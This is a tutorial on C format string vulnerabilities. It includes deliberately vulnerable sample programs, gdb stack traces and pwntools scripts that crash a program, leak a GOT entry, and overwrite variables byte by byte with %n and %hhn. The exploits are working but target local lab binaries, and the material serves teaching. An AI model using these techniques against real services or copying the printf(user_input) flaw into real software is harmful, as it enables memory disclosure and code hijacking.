Format String Vulnerability Intro

A format string is a control parameter used by a family of functions in many programming languages. It tells the function how to render its output, according to the conversion specifications (format specifiers) that the programmer supplies.

Here we discuss it on Linux.

Format String Introduction

For C format string functions, characters are usually copied literally into the function’s output, but format specifiers, which start with a % character, indicate the location and method to translate a piece of data (such as a number) to characters.

We take printf as an example.

Format string functions include:

Function	Purpose
scanf	read formatted input from stdin
printf	output to stdout
fprintf	output to FILE stream
vprintf	output to stdout according to parameter list
vfprintf	output to FILE stream according to parameter list
sprintf	output to string
snprintf	output at most a specified number of chars to string
vsprintf	output to string according to parameter list
vsnprintf	output specified number chars to string according to …
setproctitle	set argv
syslog	output log
err, verr, warn, vwarn, etc.	error and warning output

The basic form of a conversion specification is %[parameter][flags][field width][.precision][length]type; see a printf reference for the meaning of each field.

Things we need to focus on:

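parameter
- n$: select the n-th argument after the format string
flag
field width
- minimum number of characters to output
precision
- for %s, maximum number of characters to output; for integers, minimum number of digits
length
- hh: treat the argument as a char (1 byte)
- h: treat the argument as a short (2 bytes)
type
- d/i: signed int
- u: unsigned int
- x/X: unsigned int in hex
- o: unsigned int in octal
- s: string (the argument is its start address)
- c: character
- p: pointer value (an address)
- n: writes the number of characters output so far to the address given by the argument
- %: a literal %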
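
To make the field layout concrete, here is a minimal Python sketch that splits a format string into its conversion specifications. The regular expression and the helper name parse_specs are illustrative assumptions, not part of any library, and the pattern covers only the fields listed above.

```python
import re

# Pattern following %[parameter][flags][field width][.precision][length]type.
# Simplified sketch: it is not a complete printf grammar.
SPEC = re.compile(
    r"%(?:(?P<parameter>\d+)\$)?"
    r"(?P<flags>[-+ #0]*)"
    r"(?P<width>\d+|\*)?"
    r"(?:\.(?P<precision>\d+|\*))?"
    r"(?P<length>hh|h|ll|l|L|z|j|t)?"
    r"(?P<type>[diuxXoscpnfFeEgGaA%])"
)

def parse_specs(fmt):
    """Return one dict per conversion specification found in fmt."""
    return [m.groupdict() for m in SPEC.finditer(fmt)]

for spec in parse_specs("Color %s, Number %d, Float %4.2f, %6$hhn"):
    print(spec)
```

Fields that are absent come back as None (or an empty string for flags), which makes it easy to see that %6$hhn uses the parameter, length and type fields only.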

Vulnerability Principle

printf reads the format string one character at a time.

If the character is not %, it is copied to stdout.
If it is %, printf reads the next character:
- If there is none, it reports an error.
- If it is %, a single % is output.
- Otherwise the specifier is parsed and the next argument is converted and output accordingly.

Suppose we call printf incorrectly, like this:

printf("Color %s, Number %d, Float %4.2f");

With no arguments after the format string, printf still fetches one value per specifier from where the arguments would be. On 32-bit x86 that is the stack, read from the top of the stack toward the bottom.
If a value it reads is not valid for the conversion (for example, %s applied to something that is not a readable address), the program crashes; otherwise the output discloses stack data.
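
The scanning rule and the argument fetching can be modeled in a few lines of Python. This is a toy model under stated assumptions: the name toy_printf is hypothetical, only %%, %d, %x and %p are handled, and the list stack stands for the 32-bit words that sit right after the format string pointer.

```python
def toy_printf(fmt, stack):
    """Expand fmt, taking one word from `stack` per conversion.

    Toy model of the 32-bit case: supports only %%, %d, %x and %p.
    """
    out = []
    next_arg = 0
    i = 0
    while i < len(fmt):
        ch = fmt[i]
        if ch != "%":
            out.append(ch)              # ordinary character: copy as-is
            i += 1
            continue
        if i + 1 >= len(fmt):
            raise ValueError("lone % at end of format string")
        conv = fmt[i + 1]
        i += 2
        if conv == "%":
            out.append("%")             # "%%" prints a literal percent sign
            continue
        word = stack[next_arg]          # real printf reads whatever word is there
        next_arg += 1
        if conv == "d":
            # reinterpret the word as a signed 32-bit integer
            out.append(str(word - (1 << 32) if word & 0x80000000 else word))
        elif conv == "x":
            out.append("%x" % word)
        elif conv == "p":
            out.append("0x%x" % word)   # glibc prints "(nil)" for 0; ignored here
        else:
            raise ValueError("unsupported conversion: %" + conv)
    return "".join(out)

# Example words; any values would do.
stack = [0xffffd3a8, 0xf7ffd940, 0x080491a9, 0x00000000]
print(toy_printf("%x.%x.%x 100%%", stack))
```

Each specifier consumes the next word whether or not the caller ever passed one, which is the whole leak.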

Format String Exploit

The vulnerability comes from incorrect usage, such as passing user input as the format string or giving no arguments after the format specifiers.

Here is a vulnerable code sample (fmtstr.c):

#include <stdio.h>
int a = 123,b = 456;
int main(){
        int c = 789;
        char s[100];
        puts("input:");
        scanf("%s", s);
        puts("output:");
        printf(s);      //vulnerable
        return 0;
}

Compile it as follows (we start with a 32-bit build without stack protector or PIE):

$ gcc -m32 -fno-stack-protector -no-pie -o fmtstr fmtstr.c

There are 3 ways to exploit:

program crashing
memory data leaking
memory data overwriting

Crash program

The easiest way is to supply many %s specifiers, so that the program dereferences arbitrary stack values as string addresses.
This may not give you control of the program, but crashing a remote service is enough for a denial-of-service attack.

But how many %s are enough, and why?
Let's experiment with the fmtstr binary compiled above. The relationship between input and output is:

Input	Output
%s%s%s	%s%s%sW.
%s%s%s%s%s	%s%s%s%s%sW.(null)(null)
%s%s%s%s%s%s…	Segmentation fault

Use gdb to analyze: set a breakpoint on printf and run.

$ gdb fmtstr -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from fmtstr...
(No debugging symbols found in fmtstr)
gef➤  b printf
Breakpoint 1 at 0x8049030
gef➤  r
Starting program: /root/fmtstr
input:
%s%s%s          # my input
output:

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
...

Let’s look at the stack. Because the format specifiers have no matching arguments, the format string function takes its parameters from whatever is on the stack.

────────────────── stack ────
0xffffd38c│+0x0000: 0x080491fc  →  <main+106> add esp, 0x10     ← $esp
0xffffd390│+0x0004: 0xffffd3a8  →  "%s%s%s"
0xffffd394│+0x0008: 0xffffd3a8  →  "%s%s%s"     # 1st
0xffffd398│+0x000c: 0xf7ffd940  →  0x00000000   # 2nd
0xffffd39c│+0x0010: 0x080491a9  →  <main+23> add ebx, 0x2e57    # 3rd
0xffffd3a0│+0x0014: 0x00000000      # 4th
0xffffd3a4│+0x0018: 0x00000000      # 5th
0xffffd3a8│+0x001c: "%s%s%s"        # 6th
...
───────────────────

esp currently points to 0xffffd38c, which holds the return address into main. The value at 0xffffd390 is the 1st parameter of printf (the format string), and the value at 0xffffd394 is the 1st parameter of the format string (the 2nd parameter of printf).

Each %s treats a value on the stack as the start address of a string and prints what it points to. Let’s see what exactly these values point to.

gef➤  x/x 0xffffd3a8
0xffffd3a8:     0x73257325  
gef➤  x/x 0xf7ffd940
0xf7ffd940:     0x00000000
gef➤  x/x 0x080491a9
0x80491a9 <main+23>:    0x2e57c381
gef➤  x/x 0x00000000
0x0:    Cannot access memory at address 0x0
gef➤  x/x "%s%s%s"        # the 6th parameter for format string 
0xf7fce670:     0x73257325
gef➤  x/x %s%s%s
A syntax error in expression, near '%s%s%s'.
gef➤  x/x 0xffffd3a8
0xffffd3a8:     0x73257325
gef➤  x/x 0x73257325
0x73257325:     Cannot access memory at address 0x73257325
gef➤  c
Continuing.
%s%s%sW.
[Inferior 1 (process 1419) exited normally]

The output above shows what the 1st, 2nd, 3rd, 4th … parameters point to, in order.
The values on the stack normally differ between machines and between runs. However, our input is always the 6th parameter, because that position is determined by the program's instructions.

This also tells us how many %s are needed to crash the program. Each %s prints the string that an item on the stack points to, and when an item (treated as an address) points somewhere inaccessible, the program crashes.

Although the 4th and 5th parameters are 0x00000000, which is certainly inaccessible, glibc prints (null) for them instead of dereferencing them. So the first parameter that causes a crash is the 6th item, which happens to be the input string itself: its first four bytes, 0x73257325, are treated as an address.
So the answer is that 6 %s are just enough for this input (adding more does no harm).
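
The counting argument can be replayed in Python with the values from the gdb session. This is only a sketch: the helper first_crashing_s is hypothetical, and the set readable is an assumption standing in for the real memory map of the process.

```python
NULL = 0x00000000

def first_crashing_s(stack_words, readable):
    """Return the 1-based index of the first %s that would fault, or None.

    stack_words: values printf would take as successive arguments.
    readable:    set of addresses assumed to be mapped (a simplification;
                 a real check would consult the process memory map).
    """
    for index, word in enumerate(stack_words, start=1):
        if word == NULL:
            continue                # glibc prints "(null)" instead of faulting
        if word not in readable:
            return index            # dereferencing this word raises SIGSEGV
    return None

# Values copied from the gdb session; the 6th word is the start of the
# input itself ("%s%s" read as a little-endian integer).
stack_words = [0xffffd3a8, 0xf7ffd940, 0x080491a9, 0x0, 0x0, 0x73257325]
readable = {0xffffd3a8, 0xf7ffd940, 0x080491a9}

print(first_crashing_s(stack_words, readable))
```

With only the first five words the function returns None, which matches the five-%s input that printed (null)(null) and exited normally.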

Leak Memory

It includes the following operations.

Leak stack memory data
- Get variable value
- Get memory that var value (address) points to
Leak any address data
- Use GOT to get libc addr
- To dump all the program

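The basic principle is to use a format such as %n$p or %n$x, or even %n$s, to leak data from stack memory (here n is a parameter number, not the %n conversion). %p is a better choice than %x for printing stack data, because %x always prints an unsigned int (4 bytes) and therefore truncates each 8-byte item on 64-bit, while %p prints the full pointer width in both environments.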

Leak Stack

The format string %order$p prints the format string parameter at position order. We can use %10000000$p to leak the 10000000th parameter directly, instead of writing 10,000,000 %p in a row as in the previous section. In theory, we can disclose any item on the stack.

Run fmtstr to see the effect. Here I feed %6$p to leak the start of the input string.

$ gdb fmtstr -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from fmtstr...
(No debugging symbols found in fmtstr)
gef➤  b printf
Breakpoint 1 at 0x8049030
gef➤  r
Starting program: /root/fmtstr
input:
%6$p
output:

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
─────────────────── stack ────
0xffffd39c│+0x0000: 0x080491fc  →  <main+106> add esp, 0x10     ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "%6$p"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "%6$p"       # 1st
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x00000000   # 2nd
0xffffd3ac│+0x0010: 0x080491a9  →  <main+23> add ebx, 0x2e57    # 3rd
0xffffd3b0│+0x0014: 0x00000000      # 4th
0xffffd3b4│+0x0018: 0x00000000      # 5th
0xffffd3b8│+0x001c: "%6$p"          # 6th
─────────────────── 
...
gef➤  c
Continuing.
0x70243625          # "%6$p" ascii codes
[Inferior 1 (process 176) exited normally]

%p prints a pointer value, %x prints data in hex, and %s prints what a pointer points to, so we can use %s to do more creative things.
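
To check that the value printed by %6$p really is the start of the input, the hex text can be converted back into memory order. A small sketch using only the standard library; the helper name leak_to_bytes is made up for illustration and assumes a 32-bit little-endian target.

```python
import struct

def leak_to_bytes(leak_text):
    """Convert a 32-bit value printed by %p or %x back into memory order."""
    value = int(leak_text, 16)          # accepts an optional 0x prefix
    return struct.pack("<I", value)     # little-endian, as stored on x86

print(leak_to_bytes("0x70243625"))
```

The same conversion applied to 0x73257325 gives the bytes of %s%s, the word that caused the crash in the earlier experiment.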

Leak Any

Now we know where our input sits on the stack, and we have %s to print what a pointer points to. What if the input itself contains an address, and we use %s to leak what it points to? In theory, we can read any address.

The basic exploit format is addr%order$s. Raw address bytes are hard to type on stdin, so I use pwntools to send them (the scripts in this article use Python 2 syntax).
I choose __isoc99_scanf@got as the target to demonstrate that any address can be leaked. The exploit script leakanywhere.py is:

from pwn import *
sh = process('./fmtstr')
fmts = ELF('./fmtstr')
__isoc99_scanf_got = fmts.got['__isoc99_scanf'] # get `got` address of `scanf`
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%6$s'      # building payload
print payload
gdb.attach(sh)                                  # gdb debug
print sh.recv()
sh.sendline(payload)
recv = sh.recv()
print '--------------------------'
print recv
print '--------------------------'
print 'scanf@got is: '+hex(u32(recv[12:16]))    # get leaked 'got' item content
sh.interactive()

The result of running it:

$ python leakanywhere.py 
[+] Starting local process './fmtstr': pid 2770
[*] '/mnt/hgfs/Sandbox/fmtstr'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
0x804c01c
\x1c\x04%6$s
[*] running in new terminal: /usr/bin/gdb -q  "./fmtstr" 2770
[+] Waiting for debugger: Done
input:

--------------------------
output:
\x1c\x04\x90j��

--------------------------
scanf@got is: 0xf7d76a90
[*] Switching to interactive mode
[*] Process './fmtstr' stopped with exit code 0 (pid 2770)
[*] Got EOF while reading in interactive
$

The value 0xf7d76a90 is the content of the scanf GOT entry, that is, the address where scanf actually resides in libc. It changes every time you run the script.
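
For readers without pwntools at hand, the payload layout and the recv[12:16] slice can be reproduced with the standard library. This is a sketch under assumptions: build_leak_payload and parse_leak are hypothetical helpers, and the reply is simulated from the values shown in the run above rather than captured from a process.

```python
import struct

def build_leak_payload(addr, order):
    """addr%order$s for a 32-bit little-endian target."""
    return struct.pack("<I", addr) + ("%%%d$s" % order).encode()

def parse_leak(response, prefix=b"output:\n"):
    """Pull the first leaked 32-bit word out of the program's reply.

    The reply starts with the banner, then the 4 address bytes that
    printf echoed, then the bytes found at that address.
    """
    start = len(prefix) + 4             # 8 + 4 = 12, the slice offset
    return struct.unpack("<I", response[start:start + 4])[0]

payload = build_leak_payload(0x0804C01C, 6)
print(payload)

# Simulated reply, rebuilt from the values in the run above.
reply = b"output:\n" + struct.pack("<I", 0x0804C01C) + struct.pack("<I", 0xF7D76A90)
print(hex(parse_leak(reply)))
```

Two limits are worth keeping in mind: scanf("%s") stops reading at whitespace, and %s stops printing at the first zero byte, so an address or a leaked value containing such bytes needs a different approach.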

Overwrite Memory

Another notable format specifier is %n. Instead of printing characters, it stores the number of characters printed so far into the int that the corresponding argument points to. This gives us a way to write to a chosen address.
The basic principle of overwriting memory is a format like ...[overwrite addr]....%[overwrite offset]$n, where ... is padding that brings the output length up to the value we want to write.

We write overwrite.c as an example to better find out what we can do:

#include <stdio.h>
int a = 123, b = 456;
int main(){
        int c = 789;
        char s[100];
        printf("%p\n", &c);
        puts("input:");
        scanf("%s", s);
        printf(s);
        puts("----------------");
        if(c == 16){
                puts("Path 1");
        }else if(a == 2){
                puts("Path 2");
        }else if(b == 0xdeadbeef){
                puts("Path 3");
        }
        return 0;
}

Compile it (32-bit is easier to analyze, because a 64-bit program on Linux passes the first 6 arguments in registers).

$ gcc -m32 -o overwrite overwrite.c -no-pie

Basic

The first goal is to reach Path 1. With ASLR enabled, the address of a stack variable such as c changes on every run, so the program deliberately prints the address of c.

Writing 16 to c requires the address of c, which we already have, and the order (position) of our input among the parameters. The exploit has the form [addr][padding]%order$n.

Determine the order.

$ gdb ./overwrite -q
GEF for linux ready, type 'gef' to start, 'gef config' to configure
88 commands loaded for GDB 9.2 using Python engine 3.8
Reading symbols from ./overwrite...
(No debugging symbols found in ./overwrite)
gef➤  b printf
Breakpoint 1 at 0x1030
gef➤  r
Starting program: /root/overwrite
...
gef➤  c
Continuing.
0xffffd41c
input:
%p%p%p%p%p%p

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
──────────────────── stack ────
0xffffd39c│+0x0000: 0x56556227  →  <main+110> add esp, 0x10      ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "%p%p%p%p%p%p"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "%p%p%p%p%p%p"
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x56555000  →  0x464c457f
0xffffd3ac│+0x0010: 0x565561d0  →  <main+23> add ebx, 0x2e30
0xffffd3b0│+0x0014: 0x00000000
0xffffd3b4│+0x0018: 0x00000000
0xffffd3b8│+0x001c: "%p%p%p%p%p%p"
...
─────────────────────────
gef➤

Our input %p%p%p%p%p%p is the 6th parameter of the format string (the 7th parameter of printf), so order is 6. The address of c comes from the first line the program prints, so the exploit script is:

from pwn import *
sh = process('./overwrite')
recv1 = sh.recvuntil('\n', drop=True)
print recv1
c_addr = int(recv1, 16)
payload = p32(c_addr) + '%012d' + '%6$n'
print payload
#gdb.attach(sh)
sh.sendline(payload)
sh.recv()
sh.interactive()

Finally we reach Path 1.

$ python path1.py
[+] Starting local process './overwrite': pid 660
0xffda4b2c
,K%012d%6$n
[*] Switching to interactive mode
[*] Process './overwrite' stopped with exit code 0 (pid 660)
,K-00002471224----------------
Path 1
[*] Got EOF while reading in interactive
$

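Here we use %012d instead of 12 literal characters, to show another way of padding. At run time %012d is replaced by an integer zero-padded to 12 characters, which together with the 4 address bytes makes 16 characters of output before %6$n.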
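
The count that %6$n stores can be checked with a little arithmetic. A minimal sketch: chars_before_n is a hypothetical helper, the address and the padded value are the ones from the run above, and Python's %012d is used because it pads the same way as C's for this case.

```python
import struct

def chars_before_n(c_addr, first_arg):
    """Characters printf has emitted when it reaches %6$n in the Path 1 payload.

    first_arg is whatever word %012d happens to consume. Any 32-bit int
    prints in at most 11 characters, so width 12 always yields exactly 12.
    """
    addr_part = struct.pack("<I", c_addr)   # 4 raw bytes, echoed by printf
    pad_part = "%012d" % first_arg          # zero-padded to width 12
    return len(addr_part) + len(pad_part)

print(chars_before_n(0xFFDA4B2C, -2471224))
```

Because the padded field has a fixed width, the result does not depend on which value happens to be on the stack. That is the advantage over hoping a plain %d prints the right number of digits.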

Advanced

Although [addr][padding]%order$n is enough for Path 1, what about Path 2 and Path 3?

Path 2 requires setting variable a to 2. If we keep the format [addr][padding]%order$n, the [addr] part alone already prints 4 characters, so the count can never be as small as 2.

The layout is flexible, though. Move [addr] to the end to build aa%order$n[padding][addr], then determine order, [padding] and [addr].

First check the stack:

$ gdb ./overwrite -q
...
gef➤  c
Continuing.
0xffffd41c
input:
abcdefghqwerasdf

Breakpoint 1, 0xf7e31a90 in printf () from /lib/i386-linux-gnu/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
...
──────────────────── stack ────
0xffffd39c│+0x0000: 0x56556227  →  <main+110> add esp, 0x10      ← $esp
0xffffd3a0│+0x0004: 0xffffd3b8  →  "abcdefghqwerasdf"
0xffffd3a4│+0x0008: 0xffffd3b8  →  "abcdefghqwerasdf"
0xffffd3a8│+0x000c: 0xf7ffd940  →  0x56555000  →  0x464c457f
0xffffd3ac│+0x0010: 0x565561d0  →  <main+23> add ebx, 0x2e30
0xffffd3b0│+0x0014: 0x00000000
0xffffd3b4│+0x0018: 0x00000000
0xffffd3b8│+0x001c: "abcdefghqwerasdf"
───────────────────────────
gef➤  x/x 0xffffd3b8
0xffffd3b8:     0x64636261      # `abcd` in little-endian
gef➤  x/x 0xffffd3bc
0xffffd3bc:     0x68676665      # `efgh` 
gef➤  x/x 0xffffd3c0
0xffffd3c0:     0x72657771      # `qwer`
gef➤  x/x 0xffffd3c4
0xffffd3c4:     0x66647361      # `asdf`
gef➤

aa%order (here aa%8) occupies the 6th parameter (item), and $n[padding] must fill the 7th so that [addr] is aligned as the 8th parameter.
Therefore order is 8 and [padding] is 2 characters.
As a is a global variable in the .data section, and we compile with -no-pie so that the base address is static, its address 0x0804C024 does not change. So the final exploit is aa%8$nxx followed by the bytes of 0x0804C024. We still need pwntools to send it:
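
The alignment argument is easy to verify by cutting the buffer into 4-byte words and numbering them from 6. A sketch only: stack_slots is a hypothetical helper, and 0x0804C024 is taken as the address of a in the non-PIE build.

```python
import struct

def stack_slots(payload, first_index=6, word=4):
    """Split the buffer into 4-byte words and number them as printf would."""
    slots = {}
    for offset in range(0, len(payload), word):
        slots[first_index + offset // word] = payload[offset:offset + word]
    return slots

payload = b"aa%8$nxx" + struct.pack("<I", 0x0804C024)
for index, chunk in stack_slots(payload).items():
    print(index, chunk)
```

Slot 8 holds exactly the four address bytes, so %8$n writes through it, and only the two characters aa have been printed at that point.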

from pwn import *
sh = process('./overwrite')
a_addr = 0x0804C024
payload = 'aa%8$nxx' + p32(a_addr)
sh.sendline(payload)
print sh.recv()
sh.interactive()

Finally we reach Path 2.

$ python path2.py
[+] Starting local process './overwrite': pid 411
[*] Process './overwrite' stopped with exit code 0 (pid 411)
0xffea723c
input:
aaaa$----------------
Path 2

[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$

The last challenge is Path 3, which needs a huge value. Printing 0xdeadbeef (about 3.7 billion) characters of padding is not a realistic exploit.
This is where the hh and h length modifiers come in. What do they mean in a printf format specifier?

h: it stands for half.

Specifies that a following d, i, o, u, x, or X conversion specifier applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing); or that a following n conversion specifier applies to a pointer to a short int argument.

hh: presumably, for historical reasons, it stands for half of a half.

The definition is the same as for h, with short replaced by char.

Combined with %n, %hhn writes a char (1 byte) and %hn writes a short (2 bytes). Path 3 needs b to be 0xdeadbeef, so we can write it one byte at a time.
First get the address of b: 0x0804C028. Then we overwrite memory as follows:

address     hex      decimal
0x0804C028  \xef     239
0x0804C029  \xbe     190
0x0804C02a  \xad     173
0x0804C02b  \xde     222
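
The table follows directly from the little-endian layout of a 32-bit integer. A short sketch that derives it; byte_plan is a hypothetical helper name.

```python
import struct

def byte_plan(base, value):
    """List (address, byte) pairs for a 32-bit little-endian store."""
    return [(base + i, b) for i, b in enumerate(struct.pack("<I", value))]

for addr, byte in byte_plan(0x0804C028, 0xDEADBEEF):
    print(hex(addr), hex(byte), byte)
```

The least significant byte 0xef lands at the lowest address, which is why the table starts with \xef.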

Recall that the order is 6. Build the payload now:

# \xad < \xbe < \xde < \xef, so write the bytes from the smallest value to the largest;
# the printed count only grows, and each %Nc adds the difference to the next value
# (the 4 addresses already account for 16 characters)
p32(0x0804C02a)+p32(0x0804C029)+p32(0x0804C02b)+p32(0x0804C028)+'%157c'+'%6$hhn'+'%17c'+'%7$hhn'+'%32c'+'%8$hhn'+'%17c'+'%9$hhn'
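
The padding numbers 157, 17, 32 and 17 can be derived mechanically. The following sketch rebuilds the same payload with the standard library; ascending_hhn_payload is a hypothetical helper, and it assumes a 32-bit target whose buffer starts at parameter 6 and whose smallest byte value is at least 16.

```python
import struct

def ascending_hhn_payload(base, value, first_index=6):
    """Build a %hhn payload that writes the bytes of `value` smallest first."""
    raw = struct.pack("<I", value)
    # (byte value, address) pairs sorted by the byte to write
    plan = sorted((b, base + i) for i, b in enumerate(raw))
    payload = b"".join(struct.pack("<I", addr) for _, addr in plan)
    printed = len(payload)              # the 16 address bytes are output first
    for slot, (byte, _) in enumerate(plan):
        pad = byte - printed
        if pad < 0:
            raise ValueError("byte value below the running count")
        if pad:
            payload += b"%%%dc" % pad   # print `pad` more characters
        payload += b"%%%d$hhn" % (first_index + slot)
        printed = byte
    return payload

print(ascending_hhn_payload(0x0804C028, 0xDEADBEEF))
```

Sorting by byte value keeps every padding small and avoids any wrap-around, at the cost of shuffling the order of the addresses.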

This is my solution. I also found a more general approach that works for all problems of this kind (similar to fmtstr_payload in pwntools):

def fmt(prev, word, index):
    # prev: low byte of the count printed so far; word: byte to write next
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        fmtstr = ""                     # count already matches, no padding needed
    else:
        result = 256 + word - prev      # wrap around modulo 256
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr
def fmt_str(offset, size, addr, target):
    payload = ""
    # the target addresses come first, one per byte to write
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)                 # characters printed by the addresses
    for i in range(4):
        payload += fmt(prev, (target >> i*8) & 0xff, offset + i)
        prev = (target>> i*8) & 0xff
    return payload

payload = fmt_str(6,4,0x0804C028,0xdeadbeef)
# `6` represents `order`
# `4` represents `32-bit`
# `0x0804C028` indicates start address
# `0xdeadbeef` indicates what to write
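
Before sending either payload, the effect of its %Nc and %k$hhn parts can be replayed offline. This is a toy emulator under stated assumptions: emulate_hhn and read_u32 are hypothetical helpers, the first four words of the payload are taken as the write targets for parameters 6 to 9, and the second payload is the string fmt_str(6, 4, 0x0804C028, 0xdeadbeef) is expected to produce, worked out by hand.

```python
import re
import struct

TOKEN = re.compile(rb"%(\d+)c|%(\d+)\$hhn")

def emulate_hhn(payload, first_index=6, n_addrs=4):
    """Replay a payload made of addresses, %Nc and %k$hhn on a fake memory."""
    addrs = struct.unpack("<%dI" % n_addrs, payload[:4 * n_addrs])
    printed = 4 * n_addrs                   # the raw address bytes are output
    memory = {}
    for pad, index in TOKEN.findall(payload[4 * n_addrs:]):
        if pad:
            printed += int(pad)             # %Nc prints N characters
        else:
            target = addrs[int(index) - first_index]
            memory[target] = printed & 0xFF # %hhn stores the low byte only
    return memory

def read_u32(memory, base):
    """Read back a little-endian 32-bit value from the fake memory."""
    return struct.unpack("<I", bytes(memory[base + i] for i in range(4)))[0]

# Hand-sorted payload (ascending byte values).
manual = (struct.pack("<4I", 0x0804C02A, 0x0804C029, 0x0804C02B, 0x0804C028)
          + b"%157c%6$hhn%17c%7$hhn%32c%8$hhn%17c%9$hhn")
# Address-ordered payload relying on wrap-around modulo 256.
generic = (struct.pack("<4I", 0x0804C028, 0x0804C029, 0x0804C02A, 0x0804C02B)
           + b"%223c%6$hhn%207c%7$hhn%239c%8$hhn%49c%9$hhn")

print(hex(read_u32(emulate_hhn(manual), 0x0804C028)))
print(hex(read_u32(emulate_hhn(generic), 0x0804C028)))
```

Both layouts end with the same four bytes in memory. The generic one prints more padding because it lets the count wrap past 255 instead of reordering the addresses.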

Here comes the script to reach Path 3:

from pwn import *
...
sh = process('./overwrite')
payload = fmt_str(6,4,0x0804C028,0xdeadbeef)
# or
payload = p32(0x0804C02a)+p32(0x0804C029)+p32(0x0804C02b)+p32(0x0804C028)+'%157c'+'%6$hhn'+'%17c'+'%7$hhn'+'%32c'+'%8$hhn'+'%17c'+'%9$hhn'
sh.sendline(payload)
print sh.recv()
sh.interactive()

And the result:

$ python path3.py
[+] Starting local process './overwrite': pid 1327
[*] Process './overwrite' stopped with exit code 0 (pid 1327)
0xff92fc2c
input:
*)+(                                                                                                                                                                            @                               \x99                \x00---------------
Path 3

[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$